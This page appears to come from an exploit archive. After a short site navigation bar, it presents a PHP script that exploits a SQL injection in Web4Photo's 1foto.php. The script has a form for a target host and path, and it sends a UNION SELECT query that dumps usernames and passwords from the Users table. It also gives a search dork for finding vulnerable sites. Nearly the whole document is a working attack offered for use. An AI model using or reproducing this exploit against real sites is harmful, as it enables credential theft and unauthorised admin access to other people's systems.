1. #Home
2.  | 
3. #Search
4.  | 
5. #IRC(WEB / Client)
6.  | 
7. #Categories
8.  | 
9. #Links
10.  | 
11. #About

Web4Photo (1foto.php i) Remote SQL Injection Exploit
<?php if (isset($_POST['injection'])) { $target = $_POST['target']; $path = $_POST['path']; if(preg_match('/<div id="fotonadpis">(.*):(.*)<\/div>/', file_get_contents('http://'.$target.$path.'1foto.php?i=-1%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,concat(username,char(58),userpass),12,13,14,15,16,17%20from%20Users'), $user)) echo($user[1]. ":" .$user[2]. "\n<br />\n<a href=\"http://$target/admin\">Admin</a>\n"); else echo("Not exploitable.."); } ?> <pre> ########################################################## # WebPhoto SQL Injection Exploit # Vendor: http://www.web4photo.net # Live demo: http://demo.web4photo.cz # d0rk: "powered by web4photo.net by Panoramas.cz" # Coded by -=M.o.B=- # Israel # Contact: hax0r@windowslive.com ##########################################################</pre> <form method="post"> Target:<br /><input type="text" name="target" /><br /> Path:<br /><input type="text" name="path" /><br /> <input type="submit" name="injection" value="1nJ3cT" /> </form>
Back